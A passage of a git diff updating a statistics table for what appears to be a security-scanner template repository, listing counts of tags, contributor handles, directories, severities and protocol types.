security","count":1},{"name":"zandros0","count":1},{"name":"alperenkesk","count":1},{"name":"dawid-czarnecki","count":1},{"name":"retr02332","count":1},{"name":"thebinitghimire","count":1},{"name":"elmahdi","count":1},{"name":"0xd0ff9","count":1},{"name":"remonsec","count":1},{"name":"elder tao","count":1},{"name":"ringo","count":1},{"name":"_darrenmartyn","count":1},{"name":"xstp","count":1},{"name":"andirrahmani1","count":1},{"name":"smaranchand","count":1},{"name":"philippdelteil","count":1},{"name":"_c0wb0y_","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"rodnt","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sbani","count":1},{"name":"_harleo","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"its0x08","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"@dwisiswant0","count":1},{"name":"soyelmago","count":1},{"name":"jeya seelan","count":1},{"name":"manuelbua","count":1},{"name":"c3l3si4n","count":1},{"name":"hakluke","count":1},{"name":"willd96","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"0xteles","count":1},{"name":"becivells","count":1},{"name":"pdp","count":1},{"name":"pratik khalane","count":1},{"name":"x6263","count":1},{"name":"oscarintherocks","count":1},{"name":"patralos","count":1},{"name":"push4d","count":1},{"name":"jteles","count":1},{"name":"lark lab","count":1},{"name":"ipanda","count":1},{"name":"alph4byt3","count":1},{"name":"petruknisme","count":1},{"name":"exploitation","count":1},{"name":"berkdusunur","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"schniggie","count":1},{"name":"kurohost","count":1},{"name":"0h1in9e","count":1},{"name":"akshansh","count":1},{"name":"rojanrijal","count":1},{"name":"juicypotato1","count":1},{"name":"th3.d1p4k","count":1},{"name":"thezakman","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"nvn1729","count":1},{"name":"jrolf","count":1},{"name":"52971","count":1},{"name":"blckraven","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"harshinsecurity","count":1},{"name":"infosecsanyam","count":1},{"name":"@ofjaaah","count":1},{"name":"sicksec","count":1},{"name":"s1r1u5_","count":1},{"name":"deena","count":1},{"name":"tim_koopmans","count":1},{"name":"droberson","count":1},{"name":"kareemse1im","count":1},{"name":"absshax","count":1},{"name":"ahmetpergamum","count":1},{"name":"mesaglio","count":1},{"name":"zhenwarx","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"yavolo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"co0nan","count":1},{"name":"notsoevilweasel","count":1},{"name":"adrianmf","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"affix","count":1},{"name":"alex","count":1},{"name":"tirtha_mandal","count":1},{"name":"lethargynavigator","count":1},{"name":"micha3lb3n","count":1},{"name":"orpheus","count":1},{"name":"brabbit10","count":1},{"name":"luskabol","count":1},{"name":"j33n1k4","count":1},{"name":"shelld3v","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"hanlaomo","count":1},{"name":"noamrathaus","count":1},{"name":"ahmed sherif","count":1},{"name":"b0rn2r00t","count":1},{"name":"qlkwej","count":1},{"name":"revblock","count":1},{"name":"b0yd","count":1},{"name":"pudsec","count":1},{"name":"naglinagli","count":1},{"name":"un-fmunozs","count":1},{"name":"kabirsuda","count":1},{"name":"ooooooo_q","count":1},{"name":"toufik airane","count":1},{"name":"_0xf4n9x_","count":1},{"name":"shifacyclewla","count":1},{"name":"izn0u","count":1},{"name":"yashgoti","count":1},{"name":"retr0","count":1},{"name":"sec_hawk","count":1},{"name":"mubassirpatel","count":1},{"name":"gboddin","count":1},{"name":"0xtavian","count":1},{"name":"geraldino2","count":1},{"name":"nytr0gen","count":1},{"name":"igibanez","count":1},{"name":"rotemreiss","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"d0rkerdevil","count":1},{"name":"luci","count":1},{"name":"aresx","count":1},{"name":"andysvints","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"iampritam","count":1},{"name":"intx0x80","count":1},{"name":"mhdsamx","count":1},{"name":"ohlinge","count":1},{"name":"ldionmarcil","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"flag007","count":1},{"name":"defr0ggy","count":1},{"name":"majidmc2","count":1},{"name":"bolli95","count":1},{"name":"daviey","count":1},{"name":"kre80r","count":1},{"name":"mass0ma","count":1}],"directory":[{"name":"cves","count":847},{"name":"vulnerabilities","count":332},{"name":"exposed-panels","count":286},{"name":"technologies","count":203},{"name":"exposures","count":199},{"name":"misconfiguration","count":143},{"name":"token-spray","count":83},{"name":"takeovers","count":66},{"name":"default-logins","count":60},{"name":"file","count":51},{"name":"workflows","count":38},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":806},{"name":"high","count":655},{"name":"medium","count":483},{"name":"critical","count":299},{"name":"low","count":157}],"types":[{"name":"http","count":2286},{"name":"file","count":51},{"name":"network","count":46},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index ab1e9dcf49..320f1a6be8 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,930 +1,964 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | -| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | -| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | -| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | -| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | -| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | -| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | -| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 166 | zzeitlin | 63 | file | 50 | | | | | -| cve2021 | 157 | madrobot | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 55 | iot | 36 | | | | | +| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | +| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | +| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | +| wordpress | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | +| xss | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | +| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | +| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | +| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | +| cve2021 | 160 | zzeitlin | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 58 | iot | 36 | | | | | | cve2010 | 109 | gaurang | 42 | network | 33 | | | | | -| config | 99 | philippedelteil | 30 | miscellaneous | 24 | | | | | +| config | 99 | philippedelteil | 31 | miscellaneous | 24 | | | | | | cve2019 | 98 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | -| iot | 79 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 73 | pr3r00t | 15 | headless | 5 | | | | | -| oast | 70 | milo2012 | 14 | | | | | | | -| takeover | 69 | techbrunchfr | 13 | | | | | | | -| default-login | 68 | suman_kar | 12 | | | | | | | -| token | 67 | cyllective | 11 | | | | | | | -| token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | random_robbie | 10 | | | | | | | -| file | 50 | nadino | 10 | | | | | | | -| unauth | 49 | wdahlenb | 10 | | | | | | | -| network | 44 | melbadry9 | 10 | | | | | | | -| ssrf | 42 | righettod | 10 | | | | | | | -| sqli | 40 | hackergautam | 9 | | | | | | | -| | 39 | that_juan_ | 8 | | | | | | | -| redirect | 38 | zh | 8 | | | | | | | -| cve2016 | 38 | aashiq | 8 | | | | | | | -| oracle | 37 | iamthefrogy | 8 | | | | | | | +| cve2018 | 92 | organiccrap | 24 | cnvd | 10 | | | | | +| token-spray | 83 | pr3r00t | 15 | fuzzing | 10 | | | | | +| iot | 80 | sheikhrishad | 15 | headless | 5 | | | | | +| apache | 74 | milo2012 | 14 | | | | | | | +| oast | 71 | techbrunchfr | 13 | | | | | | | +| takeover | 70 | suman_kar | 12 | | | | | | | +| default-login | 68 | cyllective | 11 | | | | | | | +| token | 67 | r3dg33k | 11 | | | | | | | +| file | 51 | random_robbie | 10 | | | | | | | +| cve2017 | 51 | wdahlenb | 10 | | | | | | | +| unauth | 50 | righettod | 10 | | | | | | | +| network | 44 | nadino | 10 | | | | | | | +| ssrf | 42 | melbadry9 | 10 | | | | | | | +| sqli | 41 | hackergautam | 9 | | | | | | | +| cve2016 | 39 | iamthefrogy | 8 | | | | | | | +| | 39 | zh | 8 | | | | | | | +| redirect | 38 | aashiq | 8 | | | | | | | +| oracle | 37 | that_juan_ | 8 | | | | | | | | google | 30 | harshbothra_ | 7 | | | | | | | -| logs | 30 | randomstr1ng | 7 | | | | | | | -| jira | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 29 | techryptic (@tech) | 7 | | | | | | | -| listing | 27 | dogasantos | 7 | | | | | | | -| cisco | 27 | meme-lord | 7 | | | | | | | -| cve2014 | 27 | dr_set | 7 | | | | | | | -| generic | 24 | kophjager007 | 7 | | | | | | | -| auth-bypass | 24 | emadshanab | 7 | | | | | | | -| misconfig | 23 | logicalhunter | 6 | | | | | | | -| misc | 23 | __fazal | 6 | | | | | | | -| disclosure | 23 | pentest_swissky | 6 | | | | | | | -| router | 22 | caspergn | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| springboot | 18 | divya_mudgal | 6 | | | | | | | -| cve2012 | 18 | panch0r3d | 5 | | | | | | | -| sap | 18 | rootxharsh | 5 | | | | | | | -| debug | 17 | johnk3r | 5 | | | | | | | -| weblogic | 15 | yanyun | 5 | | | | | | | -| cve2011 | 15 | iamnoooob | 5 | | | | | | | -| php | 15 | elsfa7110 | 5 | | | | | | | -| devops | 15 | lu4nx | 5 | | | | | | | -| login | 14 | ganofins | 5 | | | | | | | -| cve2009 | 14 | xelkomy | 5 | | | | | | | -| aws | 14 | joanbono | 5 | | | | | | | -| struts | 14 | e_schultze_ | 4 | | | | | | | -| fuzz | 14 | incogbyte | 4 | | | | | | | -| android | 13 | nodauf | 4 | | | | | | | +| cve2015 | 30 | kophjager007 | 7 | | | | | | | +| logs | 30 | oppsec | 7 | | | | | | | +| atlassian | 29 | techryptic (@tech) | 7 | | | | | | | +| jira | 29 | emadshanab | 7 | | | | | | | +| cisco | 28 | 0x240x23elu | 7 | | | | | | | +| cve2014 | 27 | meme-lord | 7 | | | | | | | +| listing | 27 | randomstr1ng | 7 | | | | | | | +| auth-bypass | 25 | dogasantos | 7 | | | | | | | +| generic | 24 | dr_set | 7 | | | | | | | +| misconfig | 23 | __fazal | 6 | | | | | | | +| misc | 23 | puzzlepeaches | 6 | | | | | | | +| disclosure | 23 | divya_mudgal | 6 | | | | | | | +| router | 22 | logicalhunter | 6 | | | | | | | +| aem | 19 | johnk3r | 6 | | | | | | | +| cve2012 | 18 | pentest_swissky | 6 | | | | | | | +| sap | 18 | caspergn | 6 | | | | | | | +| springboot | 18 | xelkomy | 5 | | | | | | | +| debug | 17 | ganofins | 5 | | | | | | | +| php | 15 | joanbono | 5 | | | | | | | +| cve2011 | 15 | panch0r3d | 5 | | | | | | | +| devops | 15 | elsfa7110 | 5 | | | | | | | +| weblogic | 15 | rootxharsh | 5 | | | | | | | +| fuzz | 14 | lu4nx | 5 | | | | | | | +| wp-theme | 14 | yanyun | 5 | | | | | | | +| login | 14 | iamnoooob | 5 | | | | | | | +| aws | 14 | incogbyte | 4 | | | | | | | +| cve2009 | 14 | nodauf | 4 | | | | | | | +| struts | 14 | github.com/its0x08 | 4 | | | | | | | | deserialization | 13 | tess | 4 | | | | | | | -| zoho | 13 | wisnupramoedya | 4 | | | | | | | -| adobe | 13 | github.com/its0x08 | 4 | | | | | | | -| dlink | 13 | emenalf | 3 | | | | | | | -| dns | 13 | yash anand @yashanand155 | 3 | | | | | | | -| wp-theme | 12 | binaryfigments | 3 | | | | | | | -| jenkins | 12 | mavericknerd | 3 | | | | | | | -| manageengine | 12 | sushantkamble | 3 | | | | | | | -| xxe | 11 | fyoorer | 3 | | | | | | | -| magento | 11 | f1tz | 3 | | | | | | | -| cve2013 | 11 | impramodsargar | 3 | | | | | | | -| hp | 10 | 0w4ys | 3 | | | | | | | -| intrusive | 10 | me9187 | 3 | | | | | | | -| dell | 10 | sullo | 3 | | | | | | | -| kubernetes | 9 | johnjhacking | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| vmware | 9 | shine | 3 | | | | | | | -| ruijie | 8 | idealphase | 3 | | | | | | | -| cnvd | 8 | unstabl3 | 3 | | | | | | | -| backup | 8 | shifacyclewala | 3 | | | | | | | -| cve2008 | 8 | z3bd | 3 | | | | | | | -| ibm | 8 | dudez | 3 | | | | | | | -| fastjson | 8 | _generic_human_ | 3 | | | | | | | -| nginx | 8 | jarijaas | 3 | | | | | | | -| airflow | 8 | skeltavik | 3 | | | | | | | -| rails | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | 0xprial | 2 | | | | | | | -| microsoft | 8 | w4cky_ | 2 | | | | | | | -| scada | 8 | ree4pwn | 2 | | | | | | | -| files | 7 | hahwul | 2 | | | | | | | -| confluence | 7 | huowuzhao | 2 | | | | | | | -| cms | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| netgear | 7 | ehsahil | 2 | | | | | | | -| coldfusion | 7 | gal nagli | 2 | | | | | | | -| rconfig | 6 | afaq | 2 | | | | | | | -| api | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | hetroublemakr | 2 | | | | | | | -| nodejs | 6 | arcc | 2 | | | | | | | -| fileupload | 6 | manas_harsh | 2 | | | | | | | -| solr | 6 | kiblyn11 | 2 | | | | | | | -| citrix | 6 | zomsop82 | 2 | | | | | | | -| jetty | 6 | x1m_martijn | 2 | | | | | | | -| camera | 6 | koti2 | 2 | | | | | | | -| docker | 6 | pxmme1337 | 2 | | | | | | | -| drupal | 6 | randomrobbie | 2 | | | | | | | -| lucee | 6 | alifathi-h1 | 2 | | | | | | | -| prometheus | 6 | bp0lr | 2 | | | | | | | -| django | 6 | random-robbie | 2 | | | | | | | -| phpmyadmin | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| wso2 | 5 | lotusdll | 2 | | | | | | | -| circarlife | 5 | r12w4n | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| ssti | 5 | foulenzer | 2 | | | | | | | -| crlf | 5 | bing0o | 2 | | | | | | | -| windows | 5 | gevakun | 2 | | | | | | | -| jolokia | 5 | whoever | 2 | | | | | | | -| tomcat | 5 | vavkamil | 2 | | | | | | | -| java | 5 | convisoappsec | 2 | | | | | | | -| dedecms | 5 | r3naissance | 2 | | | | | | | -| symfony | 5 | mohammedsaneem | 2 | | | | | | | -| iis | 5 | parth | 2 | | | | | | | -| headless | 5 | 0xsmiley | 2 | | | | | | | -| asp | 4 | moritz nentwig | 2 | | | | | | | -| moodle | 4 | joeldeleep | 2 | | | | | | | -| resin | 4 | bsysop | 2 | | | | | | | -| traversal | 4 | davidmckennirey | 2 | | | | | | | -| maps | 4 | socketz | 2 | | | | | | | -| strapi | 4 | nkxxkn | 2 | | | | | | | -| slack | 4 | 0xrudra | 2 | | | | | | | -| elastic | 4 | cocxanh | 2 | | | | | | | -| thinkphp | 4 | sy3omda | 2 | | | | | | | -| artifactory | 4 | udit_thakkur | 2 | | | | | | | -| grafana | 4 | 0xcrypto | 2 | | | | | | | -| microstrategy | 4 | dheerajmadhukar | 2 | | | | | | | -| proxy | 4 | amsda | 2 | | | | | | | -| magmi | 4 | fabaff | 2 | | | | | | | -| npm | 4 | 0xsapra | 2 | | | | | | | -| firebase | 4 | g4l1t0 | 2 | | | | | | | -| glpi | 4 | swissky | 2 | | | | | | | -| symantec | 4 | undefl0w | 1 | | | | | | | -| hongdian | 4 | schniggie | 1 | | | | | | | -| git | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| exchange | 4 | lark lab | 1 | | | | | | | -| firmware | 4 | alph4byt3 | 1 | | | | | | | -| fatpipe | 4 | apt-mirror | 1 | | | | | | | -| solarwinds | 4 | @ofjaaah | 1 | | | | | | | -| zabbix | 4 | thezakman | 1 | | | | | | | -| amazon | 4 | ilovebinbash | 1 | | | | | | | -| zimbra | 4 | naglinagli | 1 | | | | | | | -| samsung | 4 | gboddin | 1 | | | | | | | -| webserver | 4 | alex | 1 | | | | | | | -| rfi | 4 | xstp | 1 | | | | | | | -| vpn | 4 | nvn1729 | 1 | | | | | | | -| buffalo | 4 | ringo | 1 | | | | | | | -| keycloak | 4 | jrolf | 1 | | | | | | | -| thinkcmf | 4 | jteles | 1 | | | | | | | -| telerik | 3 | qlkwej | 1 | | | | | | | -| kafka | 3 | fmunozs | 1 | | | | | | | -| openam | 3 | bolli95 | 1 | | | | | | | -| kevinlab | 3 | 0xrod | 1 | | | | | | | -| bitrix | 3 | mass0ma | 1 | | | | | | | -| lfr | 3 | flag007 | 1 | | | | | | | -| search | 3 | exploitation | 1 | | | | | | | -| targa | 3 | adrianmf | 1 | | | | | | | -| fanruan | 3 | shifacyclewla | 1 | | | | | | | -| ssh | 3 | iampritam | 1 | | | | | | | -| minio | 3 | s1r1u5_ | 1 | | | | | | | -| azure | 3 | izn0u | 1 | | | | | | | -| injection | 3 | micha3lb3n | 1 | | | | | | | -| nexus | 3 | affix | 1 | | | | | | | -| backdoor | 3 | florianmaak | 1 | | | | | | | -| cloud | 3 | willd96 | 1 | | | | | | | -| sonicwall | 3 | rotemreiss | 1 | | | | | | | -| itop | 3 | evolutionsec | 1 | | | | | | | -| jeesns | 3 | philippdelteil | 1 | | | | | | | -| ofbiz | 3 | revblock | 1 | | | | | | | -| openssh | 3 | andysvints | 1 | | | | | | | -| exposures | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| opensis | 3 | manuelbua | 1 | | | | | | | -| linkerd | 3 | wabafet | 1 | | | | | | | -| log | 3 | sshell | 1 | | | | | | | -| tikiwiki | 3 | pdp | 1 | | | | | | | -| node | 3 | regala_ | 1 | | | | | | | -| cacti | 3 | x6263 | 1 | | | | | | | -| mongodb | 3 | elder tao | 1 | | | | | | | -| springcloud | 3 | shreyapohekar | 1 | | | | | | | -| caucho | 3 | oscarintherocks | 1 | | | | | | | -| ebs | 3 | zandros0 | 1 | | | | | | | -| cves | 3 | _harleo | 1 | | | | | | | -| oa | 3 | igibanez | 1 | | | | | | | -| r-seenet | 3 | pudsec | 1 | | | | | | | -| hoteldruid | 3 | nytr0gen | 1 | | | | | | | -| vbulletin | 3 | clarkvoss | 1 | | | | | | | -| nosqli | 3 | mhdsamx | 1 | | | | | | | -| mail | 3 | juicypotato1 | 1 | | | | | | | -| httpd | 3 | borna nematzadeh | 1 | | | | | | | -| bigip | 3 | nerrorsec | 1 | | | | | | | -| github | 3 | _c0wb0y_ | 1 | | | | | | | -| terramaster | 3 | tirtha_mandal | 1 | | | | | | | -| zhiyuan | 3 | d0rkerdevil | 1 | | | | | | | -| nacos | 3 | becivells | 1 | | | | | | | -| cve2007 | 3 | un-fmunozs | 1 | | | | | | | -| lansweeper | 3 | 0xtavian | 1 | | | | | | | -| kibana | 3 | j33n1k4 | 1 | | | | | | | -| smtp | 3 | cookiehanhoan | 1 | | | | | | | -| fpd | 3 | ahmed sherif | 1 | | | | | | | -| jellyfin | 3 | elmahdi | 1 | | | | | | | -| druid | 3 | hanlaomo | 1 | | | | | | | -| cache | 2 | elouhi | 1 | | | | | | | -| oauth | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openvpn | 2 | yashgoti | 1 | | | | | | | -| trixbox | 2 | droberson | 1 | | | | | | | -| vcenter | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nagios | 2 | yavolo | 1 | | | | | | | -| akamai | 2 | thevillagehacker | 1 | | | | | | | -| natshell | 2 | kba@sogeti_esec | 1 | | | | | | | -| grav | 2 | dahse89 | 1 | | | | | | | -| spark | 2 | aresx | 1 | | | | | | | -| icewarp | 2 | ohlinge | 1 | | | | | | | -| hjtcloud | 2 | bad5ect0r | 1 | | | | | | | -| flir | 2 | daviey | 1 | | | | | | | -| prtg | 2 | retr02332 | 1 | | | | | | | -| ecoa | 2 | taielab | 1 | | | | | | | -| favicon | 2 | kurohost | 1 | | | | | | | -| qihang | 2 | lethargynavigator | 1 | | | | | | | -| aspose | 2 | infosecsanyam | 1 | | | | | | | -| chamilo | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| ilo | 2 | ratnadip gajbhiye | 1 | | | | | | | -| places | 2 | sec_hawk | 1 | | | | | | | -| getsimple | 2 | furkansenan | 1 | | | | | | | -| showdoc | 2 | @dwisiswant0 | 1 | | | | | | | -| leak | 2 | 52971 | 1 | | | | | | | -| text | 2 | streetofhackerr007 | 1 | | | | | | | -| liferay | 2 | fopina | 1 | | | | | | | -| axis | 2 | makyotox | 1 | | | | | | | -| kentico | 2 | th3.d1p4k | 1 | | | | | | | -| glassfish | 2 | deena | 1 | | | | | | | -| couchdb | 2 | jeya seelan | 1 | | | | | | | -| dolibarr | 2 | kabirsuda | 1 | | | | | | | -| yapi | 2 | defr0ggy | 1 | | | | | | | -| shellshock | 2 | geraldino2 | 1 | | | | | | | -| dos | 2 | 0xd0ff9 | 1 | | | | | | | -| mailchimp | 2 | sickwell | 1 | | | | | | | -| s3 | 2 | yashanand155 | 1 | | | | | | | -| nextcloud | 2 | mesaglio | 1 | | | | | | | -| linux | 2 | akash.c | 1 | | | | | | | -| sonarqube | 2 | sicksec | 1 | | | | | | | -| middleware | 2 | sbani | 1 | | | | | | | -| payara | 2 | push4d | 1 | | | | | | | -| sharepoint | 2 | its0x08 | 1 | | | | | | | -| voipmonitor | 2 | blckraven | 1 | | | | | | | -| vrealize | 2 | 0h1in9e | 1 | | | | | | | -| igs | 2 | akshansh | 1 | | | | | | | -| storage | 2 | orpheus | 1 | | | | | | | -| plesk | 2 | zhenwarx | 1 | | | | | | | -| embed | 2 | whynotke | 1 | | | | | | | -| mida | 2 | b4uh0lz | 1 | | | | | | | -| rockmongo | 2 | ahmetpergamum | 1 | | | | | | | -| huawei | 2 | ipanda | 1 | | | | | | | -| wordfence | 2 | b0yd | 1 | | | | | | | -| chyrp | 2 | ajaysenr | 1 | | | | | | | -| bucket | 2 | intx0x80 | 1 | | | | | | | -| nextjs | 2 | berkdusunur | 1 | | | | | | | -| idrac | 2 | ooooooo_q | 1 | | | | | | | -| electron | 2 | petruknisme | 1 | | | | | | | -| rancher | 2 | alperenkesk | 1 | | | | | | | -| xxljob | 2 | smaranchand | 1 | | | | | | | -| enumeration | 2 | dawid-czarnecki | 1 | | | | | | | -| pega | 2 | retr0 | 1 | | | | | | | -| hpe | 2 | 0xteles | 1 | | | | | | | -| totemomail | 2 | rojanrijal | 1 | | | | | | | -| qcubed | 2 | _darrenmartyn | 1 | | | | | | | -| maian | 2 | mubassirpatel | 1 | | | | | | | -| webcam | 2 | remonsec | 1 | | | | | | | -| avantfax | 2 | luci | 1 | | | | | | | -| guacamole | 2 | chron0x | 1 | | | | | | | -| prestashop | 2 | patralos | 1 | | | | | | | -| horde | 2 | notsoevilweasel | 1 | | | | | | | -| backups | 2 | kareemse1im | 1 | | | | | | | -| aruba | 2 | @github.com/defr0ggy | 1 | | | | | | | -| commax | 2 | raesene | 1 | | | | | | | -| kong | 2 | tim_koopmans | 1 | | | | | | | -| harbor | 2 | aceseven (digisec360) | 1 | | | | | | | -| ec2 | 2 | kre80r | 1 | | | | | | | -| sitecore | 2 | andirrahmani1 | 1 | | | | | | | -| odoo | 2 | rodnt | 1 | | | | | | | -| akkadian | 2 | bernardo rodrigues | 1 | | | | | | | +| dns | 13 | wisnupramoedya | 4 | | | | | | | +| adobe | 13 | e_schultze_ | 4 | | | | | | | +| zoho | 13 | f1tz | 3 | | | | | | | +| dlink | 13 | johnjhacking | 3 | | | | | | | +| android | 13 | 0w4ys | 3 | | | | | | | +| jenkins | 12 | shifacyclewala | 3 | | | | | | | +| manageengine | 12 | me9187 | 3 | | | | | | | +| magento | 11 | thomas_from_offensity | 3 | | | | | | | +| cve2013 | 11 | jarijaas | 3 | | | | | | | +| xxe | 11 | binaryfigments | 3 | | | | | | | +| dell | 10 | fyoorer | 3 | | | | | | | +| intrusive | 10 | sushantkamble | 3 | | | | | | | +| hp | 10 | mavericknerd | 3 | | | | | | | +| gitlab | 9 | z3bd | 3 | | | | | | | +| ftp | 9 | idealphase | 3 | | | | | | | +| vmware | 9 | sullo | 3 | | | | | | | +| ibm | 9 | impramodsargar | 3 | | | | | | | +| kubernetes | 9 | emenalf | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| microsoft | 8 | vsh00t | 3 | | | | | | | +| scada | 8 | unstabl3 | 3 | | | | | | | +| cve2008 | 8 | skeltavik | 3 | | | | | | | +| airflow | 8 | yash anand @yashanand155 | 3 | | | | | | | +| fastjson | 8 | shine | 3 | | | | | | | +| backup | 8 | dudez | 3 | | | | | | | +| ruijie | 8 | bp0lr | 2 | | | | | | | +| cnvd | 8 | hetroublemakr | 2 | | | | | | | +| nginx | 8 | gevakun | 2 | | | | | | | +| confluence | 7 | nkxxkn | 2 | | | | | | | +| files | 7 | ehsahil | 2 | | | | | | | +| netgear | 7 | afaq | 2 | | | | | | | +| coldfusion | 7 | udit_thakkur | 2 | | | | | | | +| camera | 7 | randomrobbie | 2 | | | | | | | +| cms | 7 | parth | 2 | | | | | | | +| phpmyadmin | 6 | dheerajmadhukar | 2 | | | | | | | +| api | 6 | bsysop | 2 | | | | | | | +| laravel | 6 | 0xcrypto | 2 | | | | | | | +| drupal | 6 | 0xelkomy | 2 | | | | | | | +| citrix | 6 | dahse89 | 2 | | | | | | | +| rconfig | 6 | gal nagli | 2 | | | | | | | +| prometheus | 6 | joeldeleep | 2 | | | | | | | +| lucee | 6 | amsda | 2 | | | | | | | +| docker | 6 | random-robbie | 2 | | | | | | | +| django | 6 | x1m_martijn | 2 | | | | | | | +| jetty | 6 | cocxanh | 2 | | | | | | | +| fileupload | 6 | lotusdll | 2 | | | | | | | +| nodejs | 6 | fabaff | 2 | | | | | | | +| solr | 6 | alifathi-h1 | 2 | | | | | | | +| circarlife | 5 | martincodes-de | 2 | | | | | | | +| symfony | 5 | bing0o | 2 | | | | | | | +| printer | 5 | 0xrudra | 2 | | | | | | | +| iis | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| headless | 5 | zomsop82 | 2 | | | | | | | +| java | 5 | 0xsmiley | 2 | | | | | | | +| thinkphp | 5 | foulenzer | 2 | | | | | | | +| dedecms | 5 | socketz | 2 | | | | | | | +| crlf | 5 | swissky | 2 | | | | | | | +| jolokia | 5 | pxmme1337 | 2 | | | | | | | +| tomcat | 5 | koti2 | 2 | | | | | | | +| windows | 5 | hahwul | 2 | | | | | | | +| wso2 | 5 | w4cky_ | 2 | | | | | | | +| ssti | 5 | arcc | 2 | | | | | | | +| symantec | 4 | g4l1t0 | 2 | | | | | | | +| resin | 4 | sy3omda | 2 | | | | | | | +| grafana | 4 | convisoappsec | 2 | | | | | | | +| amazon | 4 | mohammedsaneem | 2 | | | | | | | +| keycloak | 4 | moritz nentwig | 2 | | | | | | | +| npm | 4 | r12w4n | 2 | | | | | | | +| moodle | 4 | vavkamil | 2 | | | | | | | +| zimbra | 4 | manas_harsh | 2 | | | | | | | +| glpi | 4 | r3naissance | 2 | | | | | | | +| slack | 4 | kiblyn11 | 2 | | | | | | | +| webserver | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| asp | 4 | ree4pwn | 2 | | | | | | | +| solarwinds | 4 | davidmckennirey | 2 | | | | | | | +| vpn | 4 | lark-lab | 2 | | | | | | | +| exchange | 4 | huowuzhao | 2 | | | | | | | +| firmware | 4 | whoever | 2 | | | | | | | +| maps | 4 | 0xsapra | 2 | | | | | | | +| microstrategy | 4 | bernardofsr | 2 | | | | | | | +| buffalo | 4 | 0xprial | 2 | | | | | | | +| elastic | 4 | infosecsanyam | 1 | | | | | | | +| hongdian | 4 | ldionmarcil | 1 | | | | | | | +| traversal | 4 | lark lab | 1 | | | | | | | +| rfi | 4 | noamrathaus | 1 | | | | | | | +| samsung | 4 | fmunozs | 1 | | | | | | | +| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| proxy | 4 | bolli95 | 1 | | | | | | | +| strapi | 4 | thezakman | 1 | | | | | | | +| magmi | 4 | sbani | 1 | | | | | | | +| zabbix | 4 | philippdelteil | 1 | | | | | | | +| git 